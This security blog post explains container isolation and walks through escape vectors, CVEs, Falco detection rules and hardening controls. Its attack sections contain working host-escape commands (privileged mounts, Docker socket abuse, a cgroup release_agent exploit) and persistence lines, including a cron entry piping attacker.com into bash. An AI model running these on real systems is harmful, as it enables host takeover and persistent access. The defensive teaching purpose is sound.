Containers are not virtual machines. This is one of the most consequential misunderstandings in modern infrastructure security. Where a virtual machine has a full hypervisor isolation layer separating guest and host kernels, a container shares the host kernel directly. The isolation that makes containers lightweight — Linux namespaces and cgroups — is also what makes them escapable when misconfigured or when vulnerabilities are present.

This post examines how container isolation works at the kernel level, walks through the primary escape vectors with working demonstrations, covers real CVEs that enabled escapes, and provides a concrete detection and hardening framework.

How Container Isolation Works

A container is, at its core, a process (or group of processes) on the host with a restricted view of the system. That restriction is implemented through three kernel mechanisms:

Linux Namespaces

Namespaces partition global system resources so that each container sees its own isolated instance:

Namespace   Isolates
pid         Process IDs (container processes cannot see host processes)
net         Network interfaces, routing tables, iptables rules
mnt         Filesystem mount points
uts         Hostname and domain name
ipc         System V IPC, POSIX message queues
user        User and group IDs (remapped)
cgroup      Cgroup root directory (added in kernel 4.6)

A container escape fundamentally involves gaining access to the host’s root namespace — the namespace context shared by all host processes.
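
One way to see this from the defender's side is to compare namespace identifiers. On Linux, each entry under /proc/<pid>/ns is a symlink whose target looks like pid:[4026531836]; two processes share a namespace when those inode numbers match. The following is a minimal sketch, not a hardened tool: the helper names are hypothetical and the inode values in the demo are made up for illustration.

```python
import os
import re

NS_LINK = re.compile(r"^(\w+):\[(\d+)\]$")


def parse_ns_link(link: str) -> tuple[str, int]:
    """Split a /proc/<pid>/ns symlink target such as 'pid:[4026531836]'."""
    match = NS_LINK.match(link)
    if match is None:
        raise ValueError(f"unexpected namespace link: {link!r}")
    return match.group(1), int(match.group(2))


def read_namespaces(pid: str = "self") -> dict[str, int]:
    """Map each entry under /proc/<pid>/ns to its namespace inode (Linux only)."""
    ns_dir = f"/proc/{pid}/ns"
    return {
        entry: parse_ns_link(os.readlink(os.path.join(ns_dir, entry)))[1]
        for entry in os.listdir(ns_dir)
    }


def shared_namespaces(a: dict[str, int], b: dict[str, int]) -> list[str]:
    """Namespace types for which both processes reference the same inode."""
    return sorted(kind for kind in a.keys() & b.keys() if a[kind] == b[kind])


if __name__ == "__main__":
    # Illustrative inode values, not taken from a real system.
    host = {"pid": 4026531836, "net": 4026531840, "mnt": 4026531841}
    container = {"pid": 4026532201, "net": 4026531840, "mnt": 4026532199}
    print(shared_namespaces(host, container))  # ['net'] -> host networking is shared
```

On a real host, read_namespaces("1") and read_namespaces(str(container_pid)) could be compared the same way; reading another process's ns directory generally requires root.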

Control Groups (cgroups)

Cgroups limit resource consumption (CPU, memory, disk I/O, network) for process groups. They do not provide security isolation but they are critical for container functionality.

Linux Capabilities

Root on Linux is not monolithic. The kernel divides root’s traditional privileges into discrete capabilities: CAP_NET_BIND_SERVICE, CAP_SYS_ADMIN, CAP_CHOWN, etc. Docker drops many capabilities by default but retains a set sufficient for typical application use. The key attack surface: any capability that enables interaction with the host kernel in dangerous ways.
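
To make the capability set concrete, the hexadecimal CapEff value in /proc/<pid>/status can be decoded bit by bit. The sketch below assumes the capability numbering from the Linux capability header (bit 0 is CAP_CHOWN, bit 21 is CAP_SYS_ADMIN, and so on); the function name is hypothetical, and the sample mask is the value commonly seen for Docker's default capability set.

```python
# Capability names indexed by bit position, per the Linux capability header.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_caps(hex_mask: str) -> list[str]:
    """Turn a CapEff/CapPrm/CapBnd hex string into capability names."""
    mask = int(hex_mask, 16)
    names = []
    bit = 0
    while mask:
        if mask & 1:
            # Fall back to a numeric label for bits newer than this table.
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_{bit}")
        mask >>= 1
        bit += 1
    return names


if __name__ == "__main__":
    default_caps = decode_caps("00000000a80425fb")
    print(len(default_caps), "CAP_SYS_ADMIN" in default_caps)  # 14 False
```

A mask in which CAP_SYS_ADMIN, CAP_SYS_MODULE, or CAP_SYS_PTRACE appears is a reasonable trigger for a closer look at how the container was started.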

Escape Vector 1: Privileged Container

The most common and straightforward escape path is a container run with --privileged or with privileged: true in its Kubernetes pod spec.

Attack Flow

  1. Attacker gains code execution inside a privileged container (RCE via web app vulnerability, supply chain attack on container image, etc.)
  2. Container process can access all host devices via /dev
  3. Attacker mounts the host filesystem by identifying and mounting the host’s root disk

# Step 1: Confirm we're in a privileged container
grep CapEff /proc/1/status
# CapEff: 0000003fffffffff  (every capability bit set = privileged; the exact mask depends on the kernel version)

# Step 2: Identify the host disk device
fdisk -l 2>/dev/null | grep "^Disk /dev/sd"
# or: lsblk

# Step 3: Mount host root filesystem (/dev/sda1 is an example; use the device found in Step 2)
mkdir /tmp/hostfs
mount /dev/sda1 /tmp/hostfs

# Step 4: Chroot into host filesystem for full interactive access
chroot /tmp/hostfs /bin/bash

# Now we have a root shell on the host filesystem
cat /etc/shadow
ls /root/
crontab -l  # read host cron jobs
exit        # leave the chroot; the steps below use container-side paths

# Step 5: Persistence: add SSH key to host root
mkdir -p /tmp/hostfs/root/.ssh
echo "ssh-rsa AAAA...attacker_key..." >> /tmp/hostfs/root/.ssh/authorized_keys

# Or write a host-level cron job
echo "* * * * * root curl http://attacker.com/shell | bash" >> /tmp/hostfs/etc/crontab

Alternative: Privileged + nsenter

# Use nsenter to enter host namespaces directly
# Requires the host PID namespace (--pid=host or hostPID: true);
# otherwise PID 1 is the container's own init process, not the host's
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# This drops you into a bash shell in the host's mount, UTS, IPC, network, and PID namespaces
# Effectively equivalent to running bash directly on the host
hostname  # shows host hostname, not container hostname
ps aux    # shows all host processes
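
Because this path depends on the container sharing host namespaces, a manifest review can flag the combination before deployment. The sketch below checks a Kubernetes pod spec (already parsed into a dict) for hostPID, hostNetwork, hostIPC, and privileged containers. The function name is hypothetical and the check is deliberately narrow; it is not a substitute for an admission controller.

```python
def host_namespace_risks(pod_spec: dict) -> list[str]:
    """List pod-spec settings that share host namespaces or grant privileged mode."""
    findings = []
    for field in ("hostPID", "hostNetwork", "hostIPC"):
        if pod_spec.get(field) is True:
            findings.append(f"{field}: true")

    containers = (pod_spec.get("containers") or []) + (
        pod_spec.get("initContainers") or []
    )
    for container in containers:
        security_context = container.get("securityContext") or {}
        if security_context.get("privileged") is True:
            findings.append(f"container {container.get('name')!r} is privileged")
    return findings


if __name__ == "__main__":
    # Hypothetical pod spec used only for illustration.
    spec = {
        "hostPID": True,
        "containers": [
            {"name": "debug", "securityContext": {"privileged": True}},
            {"name": "app"},
        ],
    }
    for finding in host_namespace_risks(spec):
        print(finding)
```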

Escape Vector 2: Docker Socket Mount

When /var/run/docker.sock is mounted inside a container, any process in that container can talk to the Docker daemon — which runs as root on the host with full container management authority.

This is extremely common in CI/CD pipelines (Jenkins, GitLab Runner, Drone) that mount the Docker socket so build jobs can run Docker commands, a setup often loosely called “Docker-in-Docker”.

Attack Flow

  1. Attacker gains code execution inside a container with /var/run/docker.sock mounted
  2. Docker CLI (or HTTP API via curl/python) is used to create a new container
  3. The new container is started with privileged mode and the host filesystem mounted
  4. Attacker executes commands in the new container to interact with the host

# Step 1: Verify Docker socket is available
ls -la /var/run/docker.sock
# srw-rw---- 1 root docker /var/run/docker.sock

# Step 2: If Docker CLI is not available, use curl with Unix socket
curl --unix-socket /var/run/docker.sock http://localhost/version

# Step 3a: Docker CLI approach: spawn privileged container with host fs
docker run -v /:/hostfs -it --privileged alpine chroot /hostfs /bin/bash

# Step 3b: API approach using curl (no docker CLI required)
# Create container (the alpine image must already be present on the host)
curl --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "alpine",
    "Cmd": ["/bin/sh", "-c", "chroot /hostfs cat /etc/shadow"],
    "HostConfig": {
      "Binds": ["/:/hostfs:rw"],
      "Privileged": true
    }
  }' \
  -X POST "http://localhost/containers/create?name=escape"

# Start the container
curl --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/escape/start

# Read its output (start returns no body; output comes from the logs endpoint)
curl --unix-socket /var/run/docker.sock --output - \
  "http://localhost/containers/escape/logs?stdout=1"
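
On the defensive side, the same exposure can be inventoried from the output of docker inspect, which returns a JSON array whose entries carry a Mounts list with Source and Destination fields. The sketch below is an assumption-laden helper (the function names and the sample data are hypothetical) that reports containers with the Docker socket bind-mounted.

```python
import json

# Paths under which the daemon socket is commonly found on the host.
SOCKET_PATHS = ("/var/run/docker.sock", "/run/docker.sock")


def socket_mounts(inspect_entry: dict) -> list[str]:
    """Return 'source -> destination' strings for Docker socket mounts."""
    hits = []
    for mount in inspect_entry.get("Mounts") or []:
        if mount.get("Source") in SOCKET_PATHS:
            hits.append(f"{mount['Source']} -> {mount.get('Destination')}")
    return hits


def scan_inspect_output(inspect_json: str) -> dict[str, list[str]]:
    """Map container name -> socket mounts for every entry that has one."""
    report = {}
    for entry in json.loads(inspect_json):
        hits = socket_mounts(entry)
        if hits:
            report[entry.get("Name", "<unnamed>")] = hits
    return report


if __name__ == "__main__":
    # Hand-written sample shaped like `docker inspect` output.
    sample = json.dumps([
        {"Name": "/ci-runner", "Mounts": [
            {"Type": "bind", "Source": "/var/run/docker.sock",
             "Destination": "/var/run/docker.sock"}]},
        {"Name": "/web", "Mounts": []},
    ])
    print(scan_inspect_output(sample))
```

In practice the input could come from something like docker inspect $(docker ps -q), saved to a file and passed to scan_inspect_output.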

Escape Vector 3: CVE-2019-5736 (runc Binary Overwrite)

CVE-2019-5736, discovered by Adam Iwaniuk and Borys Popławski, allowed a malicious container to overwrite the host runc binary and achieve code execution as root on the host.

Affected versions: runc through 1.0-rc6 (fixed in 1.0-rc7), Docker before 18.09.2, and containerd releases that bundle a vulnerable runc

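Vulnerability mechanism: During docker exec, runc enters the container and then executes a binary taken from the container filesystem. If that binary resolves back to /proc/self/exe, runc re-executes itself inside the container, and a container process can open /proc/<pid>/exe for that runc process to obtain a handle on the host's runc binary. Once runc exits and the file is no longer busy, the container can reopen that handle for writing and overwrite the binary.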

Conceptual Attack Flow

  1. Attacker creates a malicious container image (or compromises a running container) in which a binary that will be exec'd, such as /bin/sh, points back to /proc/self/exe
  2. When docker exec is invoked on the container, runc enters the container and executes that entry, which re-executes the host runc binary inside the container
  3. A process in the container opens /proc/<pid>/exe for that runc process, obtaining a handle on the host runc binary
  4. Once runc exits, the container reopens the handle for writing and writes a malicious payload over the runc binary on the host
  5. The next time runc is invoked (for example on the next container exec), the malicious binary runs as root on the host

# Detection: check runc version
runc --version
# Patched releases report 1.0-rc7 or later (1.0-rc6 and earlier are vulnerable);
# distribution packages may backport the fix without changing the version string

# Check the runc version bundled with Docker
docker version | grep -A2 -i runc

# Verify runc binary integrity
sha256sum "$(command -v runc)"
# Compare against known-good hash from distribution vendor

Patch released: February 11, 2019. CVSS: 8.6.
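
For fleet-wide checks, the version comparison can be scripted. The sketch below parses the first version-like token from runc --version output and compares it against 1.0-rc7, the first release after the range listed as affected (runc through 1.0-rc6). The function names are hypothetical, and a version string alone is only a hint: distribution packages that backport the fix may still report an older version.

```python
import re

# Matches 1.0-rc6, 1.0.0-rc93, 1.2.0-rc.1, 1.1.12, ...
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-rc\.?(\d+))?")

# First release outside the affected range: 1.0-rc7.
FIRST_FIXED = (1, 0, 0, 7)


def parse_runc_version(text: str) -> tuple:
    """Return (major, minor, patch, rc); a final release gets rc=inf."""
    match = VERSION_RE.search(text)
    if match is None:
        raise ValueError(f"no version found in {text!r}")
    major, minor = int(match.group(1)), int(match.group(2))
    patch = int(match.group(3) or 0)
    # A final release sorts after every release candidate of the same version.
    rc = int(match.group(4)) if match.group(4) else float("inf")
    return (major, minor, patch, rc)


def looks_patched(version_output: str) -> bool:
    """True when the reported version is 1.0-rc7 or later."""
    return parse_runc_version(version_output) >= FIRST_FIXED


if __name__ == "__main__":
    for sample in ("runc version 1.0.0-rc6", "runc version 1.0.0-rc7", "runc version 1.1.12"):
        print(sample, "->", "patched" if looks_patched(sample) else "vulnerable")
```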

Escape Vector 4: CVE-2022-0492 (cgroup v1 release_agent)

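This vulnerability abused the release_agent feature in cgroup v1. When the last process in a cgroup with notify_on_release enabled exits, the kernel executes the program specified in release_agent as root in the host's initial namespaces. The flaw was a missing privilege check: the kernel did not verify that the process writing release_agent held CAP_SYS_ADMIN in the initial user namespace.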

Conditions required for exploitation:

  • Container must have the CAP_SYS_ADMIN capability, or be able to obtain it inside a new user namespace, so that it can mount a cgroup filesystem
  • cgroup v1 must be in use (not cgroup v2)
  • User namespaces must be available if the container does not already hold CAP_SYS_ADMIN

# Step 1: Check if cgroup v1 is available and we can mount it
cat /proc/1/cgroup | head -5
# cgroup v1 shows numbered controller lines (e.g., 5:memory:/...); a single 0::/ line indicates cgroup v2

# Step 2: Create a new cgroup hierarchy with a release_agent
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x

# Step 3: Set up the release_agent to write host root access
echo 1 > /tmp/cgrp/x/notify_on_release
# Host-side path of the container's overlay upper directory
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/exploit" > /tmp/cgrp/release_agent

# Step 4: Write the payload that runs on the host
cat > /exploit << 'EOF'
#!/bin/sh
ps aux > /output
chmod 777 /output
EOF
chmod a+x /exploit

# Step 5: Trigger cgroup empty notification by starting and killing a process
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs && exit"

# Step 6: Read the output file that was written by the host-level release_agent
cat /output  # Contains host process listing

Patch released: February 2022, kernel 5.17-rc3. CVSS: 7.8.
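
Since exploitation depends on cgroup v1, it helps to know which mode a host or container is actually running. In /proc/<pid>/cgroup, a cgroup v2 entry has the form 0::/path, while v1 entries carry a non-zero hierarchy ID and a controller list. The sketch below classifies that file's contents; the function name is hypothetical.

```python
def cgroup_mode(proc_cgroup_text: str) -> str:
    """Classify /proc/<pid>/cgroup contents as 'v1', 'v2', 'hybrid', or 'unknown'."""
    saw_v1 = saw_v2 = False
    for line in proc_cgroup_text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) != 3:
            continue  # not a hierarchy-id:controllers:path line
        hierarchy_id, controllers, _path = parts
        if hierarchy_id == "0" and controllers == "":
            saw_v2 = True  # unified hierarchy entry
        else:
            saw_v1 = True  # legacy or named hierarchy entry
    if saw_v1 and saw_v2:
        return "hybrid"
    if saw_v1:
        return "v1"
    if saw_v2:
        return "v2"
    return "unknown"


if __name__ == "__main__":
    legacy = "12:memory:/docker/abc\n11:cpu,cpuacct:/docker/abc\n"
    unified = "0::/system.slice/docker-abc.scope\n"
    print(cgroup_mode(legacy), cgroup_mode(unified))  # v1 v2
```

A result of v1 or hybrid means the release_agent interface exists on that system, so kernel patch level and the other conditions above deserve a check.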

Real Incident: Docker Daemon Exposed Over TCP

In 2019, multiple cryptocurrency mining campaigns (tracked by Palo Alto Unit 42 and Aqua Security) exploited Docker daemons that had been configured to listen on TCP port 2375 without TLS authentication — a configuration explicitly warned against in Docker documentation but commonly found in development environments.

Attack pattern:

  1. Masscan/Shodan enumeration for port 2375 open on the internet
  2. Connection to unauthenticated Docker API: curl http://target:2375/containers/json
  3. Deploy a new container with host / mounted
  4. Install cryptocurrency miner (XMRig) as a persistent host process via cron or systemd

Aqua Security estimated over 400 honeypot hits per day at the peak of these campaigns in 2019. Similar attacks targeting exposed Kubernetes API servers ran in parallel.
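
A quick configuration audit can catch this exposure before a scanner does. The sketch below inspects a parsed /etc/docker/daemon.json and reports tcp:// listeners that are not protected by tlsverify. It is an assumption-laden check: the function name is hypothetical, and it only sees the hosts and tlsverify keys in the file, not listeners passed to dockerd with -H on the command line.

```python
import json


def insecure_tcp_hosts(daemon_config: dict) -> list[str]:
    """Return tcp:// listeners from daemon.json that lack client verification."""
    tls_enforced = bool(daemon_config.get("tlsverify"))
    hosts = daemon_config.get("hosts") or []
    return [
        host for host in hosts
        if host.startswith("tcp://") and not tls_enforced
    ]


if __name__ == "__main__":
    # Hand-written example of a risky development configuration.
    config = json.loads(
        '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
    )
    for host in insecure_tcp_hosts(config):
        print(f"unauthenticated Docker API listener: {host}")
```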

Detection with Falco

Falco is the de facto standard for runtime security monitoring of containers. It uses eBPF or kernel module probes to detect syscall-level anomalies.

# /etc/falco/rules.d/container-escape.yaml

# Detect privileged container creation
- rule: Create Privileged Container
  desc: Detect creation of a privileged container
  condition: >
    container.id != host
    and evt.type = container
    and container.privileged = true
  output: >
    Privileged container started (user=%user.name command=%proc.cmdline
    container_id=%container.id image=%container.image.repository)
  priority: WARNING
  tags: [container, privilege-escalation, T1611]

# Detect Docker socket access from within a container
# Note: clients normally connect() to the socket rather than open() it,
# so this condition may need a connect-based variant in your environment
- rule: Docker Socket Accessed from Container
  desc: Detect access to Docker socket from inside a container
  condition: >
    open_write
    and container
    and fd.name = /var/run/docker.sock
  output: >
    Docker socket accessed inside container (user=%user.name
    command=%proc.cmdline container=%container.name)
  priority: CRITICAL
  tags: [container, escape, T1611]

# Detect nsenter execution (namespace escape tool)
- rule: nsenter Executed in Container
  desc: Detect nsenter used to enter host namespaces
  condition: >
    spawned_process
    and container
    and proc.name = nsenter
  output: >
    nsenter executed in container (user=%user.name args=%proc.args
    container=%container.name pid=%proc.pid)
  priority: CRITICAL

# Detect mount commands that reference /proc, /dev, or /sys
- rule: Sensitive Host Filesystem Mounted
  desc: Detect mounting of sensitive host paths
  condition: >
    spawned_process
    and container
    and proc.name = mount
    and (proc.args contains "/proc" or proc.args contains "/dev" or proc.args contains "/sys")
  output: >
    Sensitive host filesystem mounted in container
    (command=%proc.cmdline container=%container.name)
  priority: CRITICAL
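
Rules like these are only useful if their alerts are triaged. Assuming Falco is configured for JSON output, with one object per line carrying rule and priority fields, a small filter can pull out the alerts at or above a chosen severity. This is a sketch under that assumption: the function name is hypothetical, and the priority ordering is written out by hand and should be checked against the Falco version in use.

```python
import json

# Highest severity first; compared case-insensitively.
PRIORITIES = [
    "emergency", "alert", "critical", "error",
    "warning", "notice", "informational", "debug",
]


def alerts_at_least(lines, min_priority: str = "critical") -> list[dict]:
    """Keep JSON alert lines whose priority is min_priority or more severe."""
    threshold = PRIORITIES.index(min_priority.lower())
    selected = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON log lines
        if not isinstance(event, dict):
            continue
        priority = str(event.get("priority", "")).lower()
        if priority in PRIORITIES and PRIORITIES.index(priority) <= threshold:
            selected.append(event)
    return selected


if __name__ == "__main__":
    # Hand-written sample lines; field values are illustrative.
    sample = [
        '{"rule": "nsenter Executed in Container", "priority": "Critical"}',
        '{"rule": "Create Privileged Container", "priority": "Warning"}',
    ]
    for event in alerts_at_least(sample, "critical"):
        print(event["rule"])
```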

Audit Log Monitoring

# Kubernetes audit log: detect privileged pod creation
# Query audit logs for pods with privileged security context
# (requestObject is only recorded at audit level Request or RequestResponse)
python3 -c "
import sys, json
for line in sys.stdin:
    try:
        event = json.loads(line)
    except json.JSONDecodeError:
        continue  # skip malformed lines instead of hiding every error
    ref = event.get('objectRef') or {}
    if event.get('verb') not in ('create', 'update') or ref.get('resource') != 'pods':
        continue
    spec = (event.get('requestObject') or {}).get('spec') or {}
    containers = (spec.get('containers') or []) + (spec.get('initContainers') or [])
    for container in containers:
        sc = container.get('securityContext') or {}
        if sc.get('privileged'):
            name = ref.get('name')
            user = (event.get('user') or {}).get('username')
            print(f'ALERT: Privileged pod: {name} by {user}')
" < /var/log/kubernetes/audit.log

# Check Docker daemon audit logs (assumes an auditd rule tagged with the key "docker")
ausearch -k docker --interpret | grep -E "privileged|/var/run/docker.sock"

Defense and Hardening

Control 1: Rootless Docker

# Install rootless Docker (requires uidmap package)
dockerd-rootless-setuptool.sh install

# Point the client at the rootless daemon's socket
export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock

# Verify rootless operation
docker info | grep -i rootless
# Should list "rootless" under Security Options
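
The verification step can also be automated. Assuming the daemon's security options are exported as a JSON list of strings such as name=seccomp,profile=builtin (the shape produced by docker info --format '{{json .SecurityOptions}}'), the sketch below parses them into a lookup table. The function name and the sample values are illustrative.

```python
import json


def parse_security_options(raw_json: str) -> dict[str, dict[str, str]]:
    """Turn ['name=seccomp,profile=builtin', 'name=rootless'] into a dict by name."""
    options = {}
    for item in json.loads(raw_json):
        fields = dict(part.split("=", 1) for part in item.split(",") if "=" in part)
        name = fields.pop("name", None)
        if name:
            options[name] = fields  # remaining key=value pairs, possibly empty
    return options


if __name__ == "__main__":
    # Sample value written by hand for illustration.
    raw = '["name=seccomp,profile=builtin", "name=rootless", "name=cgroupns"]'
    options = parse_security_options(raw)
    for required in ("rootless", "seccomp", "apparmor"):
        status = "enabled" if required in options else "MISSING"
        print(f"{required}: {status}")
```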

Control 2: Seccomp Profiles

Seccomp (Secure Computing Mode) restricts which syscalls a container process can make. The default Docker seccomp profile blocks ~44 syscalls. Apply stricter profiles:

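# Docker applies its default seccomp profile automatically; passing a copy explicitly
# (the path below is an example location) makes the choice visible in the run command
docker run --security-opt seccomp=/etc/docker/seccomp-default.json myapp

# Use a custom denylist profile that blocks mount- and namespace-related syscalls.
# defaultAction must be SCMP_ACT_ALLOW here: with SCMP_ACT_ERRNO as the default,
# every syscall is denied and the container cannot start. clone is not listed
# because blocking it outright prevents process and thread creation.
# Note: this profile replaces Docker's default profile instead of extending it.
cat > /etc/docker/seccomp-restricted.json << 'EOF'
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["mount", "umount2", "pivot_root", "unshare", "setns"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
EOF
docker run --security-opt seccomp=/etc/docker/seccomp-restricted.json myapp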
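
Before shipping a custom profile, it is worth checking what it actually permits, since a wrong defaultAction can silently turn a denylist into a deny-everything profile. The sketch below resolves the action a profile assigns to a given syscall. It is a simplification with hypothetical function names: it ignores argument filters and capability-based includes/excludes, and it assumes each syscall appears in at most one rule.

```python
def effective_action(profile: dict, syscall: str) -> str:
    """Action for a syscall: the matching rule's action, else defaultAction."""
    for rule in profile.get("syscalls") or []:
        if syscall in (rule.get("names") or []):
            return rule.get("action")
    return profile.get("defaultAction")


def allows(profile: dict, syscall: str) -> bool:
    """True when the resolved action is SCMP_ACT_ALLOW."""
    return effective_action(profile, syscall) == "SCMP_ACT_ALLOW"


if __name__ == "__main__":
    # Illustrative denylist profile: allow by default, block mount-related calls.
    denylist = {
        "defaultAction": "SCMP_ACT_ALLOW",
        "syscalls": [
            {"names": ["mount", "umount2", "pivot_root"], "action": "SCMP_ACT_ERRNO"}
        ],
    }
    # A workload needs basics such as execve and read; mount should be refused.
    for name in ("execve", "read", "mount"):
        print(name, "allowed" if allows(denylist, name) else "blocked")
```

Running the same check with defaultAction set to SCMP_ACT_ERRNO and no allow rules shows execve as blocked, which is the signature of a profile no container can start under.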

Control 3: AppArmor / SELinux

# Verify AppArmor is active for Docker
docker info | grep -i apparmor
# Should show: Security Options: apparmor

# Apply a custom AppArmor profile
cat > /etc/apparmor.d/docker-no-escape << 'EOF'
#include <tunables/global>
profile docker-no-escape flags=(attach_disconnected,mediate_deleted) {
  #include <abstractions/base>
  # Baseline allowances, as in Docker's default profile; without them most workloads cannot start
  network,
  capability,
  file,
  deny mount,
  deny /proc/sysrq-trigger rwklx,
  deny /proc/mem rwklx,
  deny /proc/kcore rwklx,
  deny /sys/** wklx,
}
EOF
apparmor_parser -r /etc/apparmor.d/docker-no-escape
docker run --security-opt apparmor=docker-no-escape myapp

Control 4: Drop Capabilities and Read-Only Root Filesystem

# Run with minimal capabilities and read-only filesystem
docker run \
  --cap-drop ALL \
  --cap-add NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp \
  --security-opt no-new-privileges \
  myapp

# Equivalent Kubernetes container-level securityContext
cat << 'EOF'
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop:
      - ALL
    add:
      - NET_BIND_SERVICE
EOF
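
These settings are easy to drift away from over time, so a manifest linter can help. The sketch below takes a container-level securityContext (parsed into a dict) and lists which of the hardening settings shown above are missing. The function name is hypothetical and the rule set is intentionally limited to the fields used in this section.

```python
def hardening_gaps(security_context: dict) -> list[str]:
    """List hardening settings from this section that the context does not set."""
    gaps = []
    if security_context.get("privileged"):
        gaps.append("privileged is true")
    if security_context.get("allowPrivilegeEscalation") is not False:
        gaps.append("allowPrivilegeEscalation is not false")
    if security_context.get("readOnlyRootFilesystem") is not True:
        gaps.append("readOnlyRootFilesystem is not true")
    if security_context.get("runAsNonRoot") is not True:
        gaps.append("runAsNonRoot is not true")
    drops = (security_context.get("capabilities") or {}).get("drop") or []
    if "ALL" not in [str(cap).upper() for cap in drops]:
        gaps.append("capabilities.drop does not include ALL")
    return gaps


if __name__ == "__main__":
    hardened = {
        "runAsNonRoot": True,
        "runAsUser": 1000,
        "allowPrivilegeEscalation": False,
        "readOnlyRootFilesystem": True,
        "capabilities": {"drop": ["ALL"], "add": ["NET_BIND_SERVICE"]},
    }
    print(hardening_gaps(hardened))  # []
    print(hardening_gaps({"privileged": True}))
```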

Control 5: OPA Gatekeeper Policy

# Gatekeeper ConstraintTemplate to block privileged containers
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8spspprivilegedcontainer
spec:
  crd:
    spec:
      names:
        kind: K8sPSPPrivilegedContainer
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8spspprivilegedcontainer
        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          container.securityContext.privileged == true
          msg := sprintf("Container %v must not run as privileged", [container.name])
        }
---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
  name: psp-privileged-container
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]

MITRE ATT&CK Mapping

  • T1611 — Escape to Host: Adversaries may break out of a container to gain access to the host operating system.
  • T1610 — Deploy Container: Deploy a malicious container into a compromised environment to facilitate escape.
  • T1552.007 — Container API: Access container runtime APIs to gather credentials or escalate privileges.

References